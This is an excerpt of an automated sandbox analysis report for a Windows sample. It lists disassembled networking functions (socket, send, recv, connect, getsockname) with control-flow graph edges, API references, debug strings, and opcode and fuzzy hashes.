                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                            • API String ID: 2809346765-3388739168
                                            • Opcode ID: 946504258111dcda3ce98ded04bfa397d1fae187bde4a81d4f21951585e494b6
                                            • Instruction ID: 633882a73a2aa53cf4357c66ff456980b8f057750c1644db217bf72d0016f48c
                                            • Opcode Fuzzy Hash: 946504258111dcda3ce98ded04bfa397d1fae187bde4a81d4f21951585e494b6
                                            • Instruction Fuzzy Hash: F9113AB06093087BF5105B29AC4AE6B3B5CEBC3B2CF441518F809A3751E2619D40A2F3
                                            Function 0096AA30 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1641 96aa30-96aa64 1643 96ab04-96ab09 1641->1643 1644 96aa6a-96aaa7 call 95e730 1641->1644 1645 96ae80-96ae89 1643->1645 1648 96ab0e-96ab13 1644->1648 1649 96aaa9-96aabd 1644->1649 1650 96ae2e 1648->1650 1651 96aabf-96aac7 1649->1651 1652 96ab18-96ab50 1649->1652 1654 96ae30-96ae4a call 95ea60 call 95ebf0 1650->1654 1651->1650 1653 96aacd-96ab02 1651->1653 1658 96ab58-96ab6d 1652->1658 1653->1658 1668 96ae75-96ae7d 1654->1668 1669 96ae4c-96ae57 1654->1669 1660 96ab96-96abab socket 1658->1660 1661 96ab6f-96ab73 1658->1661 1660->1650 1665 96abb1-96abc5 1660->1665 1661->1660 1663 96ab75-96ab8f 1661->1663 1663->1665 1680 96ab91 1663->1680 1666 96abc7-96abca 1665->1666 1667 96abd0-96abed ioctlsocket 1665->1667 1666->1667 1672 96ad2e-96ad39 1666->1672 1673 96ac10-96ac14 1667->1673 1674 96abef-96ac0a 1667->1674 1668->1645 1670 96ae6e-96ae74 1669->1670 1671 96ae59-96ae5e 1669->1671 1670->1668 1671->1670 1676 96ae60-96ae6c 1671->1676 1681 96ad52-96ad56 1672->1681 1682 96ad3b-96ad4c 1672->1682 1677 96ac16-96ac31 1673->1677 1678 96ac37-96ac41 1673->1678 1674->1673 1684 96ae29 1674->1684 1676->1668 1677->1678 1677->1684 1687 96ac43-96ac46 1678->1687 1688 96ac7a-96ac7e 1678->1688 1680->1650 1683 96ad5c-96ad6b 1681->1683 1681->1684 1682->1681 1682->1684 1693 96ad70-96ad78 1683->1693 1684->1650 1695 96ad04-96ad08 1687->1695 1696 96ac4c-96ac51 1687->1696 1689 96ace7-96ad03 1688->1689 1690 96ac80-96ac9b 1688->1690 1689->1695 1690->1689 1697 96ac9d-96acc1 1690->1697 1698 96ada0-96adae connect 1693->1698 1699 96ad7a-96ad7f 1693->1699 1695->1672 1700 96ad0a-96ad28 1695->1700 1696->1695 1701 96ac57-96ac78 1696->1701 1702 96acc6-96acd7 1697->1702 1705 96adb3-96adcf 1698->1705 1699->1698 1703 96ad81-96ad99 1699->1703 1700->1672 1700->1684 1701->1702 1702->1684 1711 96acdd-96ace5 1702->1711 1703->1705 1712 96add5-96add8 1705->1712 1713 96ae8a-96ae91 1705->1713 1711->1689 1711->1695 1714 96ade1-96adf1 1712->1714 1715 96adda-96addf 1712->1715 1713->1654 1716 96adf3-96ae07 1714->1716 1717 96ae0d-96ae12 1714->1717 1715->1693 1715->1714 1716->1717 1722 96aea8-96aead 1716->1722 1718 96ae14-96ae17 1717->1718 1719 96ae1a-96ae1c call 96af70 1717->1719 1718->1719 1723 96ae21-96ae23 1719->1723 1722->1654 1724 96ae25-96ae27 1723->1724 1725 96ae93-96ae9d 1723->1725 1724->1654 1726 96aeaf-96aeb1 call 95e760 1725->1726 1727 96ae9f-96aea6 call 95e7c0 1725->1727 1730 96aeb6-96aebe 1726->1730 1727->1730 1732 96aec0-96aedb call 95e180 1730->1732 1733 96af1a-96af1f 1730->1733 1732->1654 1736 96aee1-96aeec 1732->1736 1733->1654 1737 96af02-96af06 1736->1737 1738 96aeee-96aeff 1736->1738 1739 96af0e-96af15 1737->1739 1740 96af08-96af0b 1737->1740 1738->1737 1739->1645 1740->1739
                                            APIs
                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0096AB9A
                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0096ABE4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ioctlsocketsocket
                                            • String ID: ;z
                                            • API String ID: 416004797-1617089705
                                            • Opcode ID: 10eb13101cdb0dff6d7ac95544653833c5bef52863bacb6900bc15c34ae127da
                                            • Instruction ID: 01773c537b9790ca5a6b78e28782fd65dd234920132c9a6e1f5f0ddf29d63b00
                                            • Opcode Fuzzy Hash: 10eb13101cdb0dff6d7ac95544653833c5bef52863bacb6900bc15c34ae127da
                                            • Instruction Fuzzy Hash: 94E1CF706043019BEB20CF24C885B6BB7E9EF89310F144A2DF999AB291D776D944DF92
                                            Function 008A7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1742 8a7770-8a778e 1743 8a7790-8a7797 1742->1743 1744 8a77b6-8a77c2 recv 1742->1744 1743->1744 1745 8a7799-8a77a1 1743->1745 1746 8a782e-8a7832 1744->1746 1747 8a77c4-8a77d9 call 8a72a0 1744->1747 1748 8a77db-8a7829 call 8a72a0 call 8acb20 call c28c50 1745->1748 1749 8a77a3-8a77b4 1745->1749 1747->1746 1748->1746 1749->1747
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: recv
                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                            • API String ID: 1507349165-640788491
                                            • Opcode ID: 7503a00f10a534ced7afd131656f27575dabda19500dd0809e6c504895414e4b
                                            • Instruction ID: d89711edb281897ed9dc6c6ed29155d2fd95a0ed1dd7184a250dcc9e2374b15b
                                            • Opcode Fuzzy Hash: 7503a00f10a534ced7afd131656f27575dabda19500dd0809e6c504895414e4b
                                            • Instruction Fuzzy Hash: 89113DB4A093483BF1209714AC4AF7B3B5CEBC7B7CF040528F809A3352E6519C4491F2
                                            Function 008A75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1761 8a75e0-8a75ed 1762 8a75ef-8a75f6 1761->1762 1763 8a7607-8a7629 socket 1761->1763 1762->1763 1764 8a75f8-8a75ff 1762->1764 1765 8a762b-8a763c call 8a72a0 1763->1765 1766 8a763f-8a7642 1763->1766 1767 8a7643-8a7699 call 8a72a0 call 8acb20 call c28c50 1764->1767 1768 8a7601-8a7602 1764->1768 1765->1766 1768->1763
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                            • API String ID: 98920635-842387772
                                            • Opcode ID: 83bc32aafcfc8a4da10107b67bf96157f29d6b2ad84615eecd79e78e5cbe226a
                                            • Instruction ID: 2b30ee836359b79dabee40e493a5e29554676e4259f541f23c10bcca5c86fdfd
                                            • Opcode Fuzzy Hash: 83bc32aafcfc8a4da10107b67bf96157f29d6b2ad84615eecd79e78e5cbe226a
                                            • Instruction Fuzzy Hash: 40114876B0571137E610572DAC06FDB3B88EF92734F051524F818E22E2D312C9A4F2E2
                                            Function 00C28E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1870 c28e90-c28eb8 _open 1871 c28eba-c28ec7 1870->1871 1872 c28eff-c28f2c call c29f70 1870->1872 1873 c28ef3-c28efa call c28d20 1871->1873 1874 c28ec9 1871->1874 1880 c28f39-c28f51 call c28ca8 1872->1880 1873->1872 1876 c28ee2-c28ef1 1874->1876 1877 c28ecb-c28ecd 1874->1877 1876->1873 1876->1874 1881 c28ed3-c28ed6 1877->1881 1882 d31670-d31687 1877->1882 1888 c28f53-c28f5e call c28cc0 1880->1888 1889 c28f30-c28f37 1880->1889 1881->1876 1886 c28ed8 1881->1886 1884 d3168a-d316b1 1882->1884 1885 d31689 1882->1885 1890 d316b9-d316bf 1884->1890 1886->1876 1888->1871 1889->1880 1889->1888 1892 d316c1-d316cf 1890->1892 1893 d316d9-d316fb 1890->1893 1895 d316d5-d316d8 1892->1895 1897 d31706-d3171b 1893->1897 1898 d316fd-d31704 1893->1898 1897->1892 1898->1897 1899 d3171d-d31732 1898->1899 1899->1895
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: _open
                                            • String ID: terminated$@
                                            • API String ID: 4183159743-3016906910
                                            • Opcode ID: 81f979119b3389291453696a34b2ac50906a37cba28608a43bec7a97bcc435ff
                                            • Instruction ID: 040d78e4448007a10cf3e2fce207899b74d1505aeefa3a4d09d515dded0159db
                                            • Opcode Fuzzy Hash: 81f979119b3389291453696a34b2ac50906a37cba28608a43bec7a97bcc435ff
                                            • Instruction Fuzzy Hash: B1418BB49053158FDB10EFB9D84466EBBF4AB88314F048A2DE898D7240E774C949DF62
                                            Function 008DA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1902 8da150-8da159 1903 8da15f-8da17b 1902->1903 1904 8da250 1902->1904 1905 8da249-8da24f 1903->1905 1906 8da181-8da1ce getsockname 1903->1906 1905->1904 1907 8da1f7-8da214 call 8def30 1906->1907 1908 8da1d0-8da1f5 call 8bd090 1906->1908 1907->1905 1913 8da216-8da23b call 8bd090 1907->1913 1915 8da240-8da246 call 8e4f40 1908->1915 1913->1915 1915->1905
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 008DA1C7
                                            Strings
                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 008DA23B
                                            • getsockname() failed with errno %d: %s, xrefs: 008DA1F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                            • API String ID: 3358416759-2605427207
                                            • Opcode ID: bdeea475cf0288dc10e31e233a0d89f2ae0e7575b3ca01db793dd1c036956049
                                            • Instruction ID: 88924e33132988f0c3ad50032b10a64a8257a7ef1aeaaae90c33cc37316f772a
                                            • Opcode Fuzzy Hash: bdeea475cf0288dc10e31e233a0d89f2ae0e7575b3ca01db793dd1c036956049
                                            • Instruction Fuzzy Hash: 3E21F871808780BAE6259729EC42FE673ACFF91328F040655F98893151FE32698686E3
                                            Function 008BD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1922 8bd5e0-8bd5ee 1923 8bd652-8bd662 WSAStartup 1922->1923 1924 8bd5f0-8bd604 call 8bd690 1922->1924 1926 8bd670-8bd676 1923->1926 1927 8bd664-8bd66f 1923->1927 1930 8bd61b-8bd651 call 8c7620 1924->1930 1931 8bd606-8bd614 1924->1931 1926->1924 1929 8bd67c-8bd68d 1926->1929 1931->1930 1936 8bd616 1931->1936 1936->1930
                                            APIs
                                            • WSAStartup.WS2_32(00000202), ref: 008BD65A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: Startup
                                            • String ID: if_nametoindex$iphlpapi.dll
                                            • API String ID: 724789610-3097795196
                                            • Opcode ID: 0324ee14d64e62b996982568973d90756ac217ed18c5e927b529e0ce97d4487f
                                            • Instruction ID: c8b0ed0d80c9d15d8456de0c3ff924dc35d70b7342020ff01fd0da00f367c7ac
                                            • Opcode Fuzzy Hash: 0324ee14d64e62b996982568973d90756ac217ed18c5e927b529e0ce97d4487f
                                            • Instruction Fuzzy Hash: 52012BD0D4034576E7216B3CAC1B7A63690BB63308F452478D888E52D2F769C988D2D3
                                            Function 008A78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: FD %s:%d sclose(%d)
                                            • API String ID: 2781271927-3116021458
                                            • Opcode ID: b57c312634e25d0a3c0d10335a4c126abc9be3bfdbb6603993862ba928dc5e67
                                            • Instruction ID: a217e8b49589c0e94d17ffa1d19d16b955b6464dcd9fa2f1409a17f5adced151
                                            • Opcode Fuzzy Hash: b57c312634e25d0a3c0d10335a4c126abc9be3bfdbb6603993862ba928dc5e67
                                            • Instruction Fuzzy Hash: 34D05E33A092212B852069997C49C9B6BA8EDC7F60F4A0C68F941B7605D1209C4097E2
                                            Function 0096B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0096B29E,?,00000000,?,?), ref: 0096B0B9
                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00953C41,00000000), ref: 0096B0C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ErrorLastconnect
                                            • String ID:
                                            • API String ID: 374722065-0
                                            • Opcode ID: ce6f4ef1d31ec3275e9497097003df4730124da6a8d7a14e0bfe642f3692a237
                                            • Instruction ID: 151131dc52e2c84676c4a80067e7239f7b6506c76604208afb568c4a9e3d7182
                                            • Opcode Fuzzy Hash: ce6f4ef1d31ec3275e9497097003df4730124da6a8d7a14e0bfe642f3692a237
                                            • Instruction Fuzzy Hash: DE01D8322043005BCA205A798C44F6BBB9DFF89364F040B14F97CD31D1E726DD909752
                                            Function 00954950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • gethostname.WS2_32(00000000,00000040), ref: 00954AA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
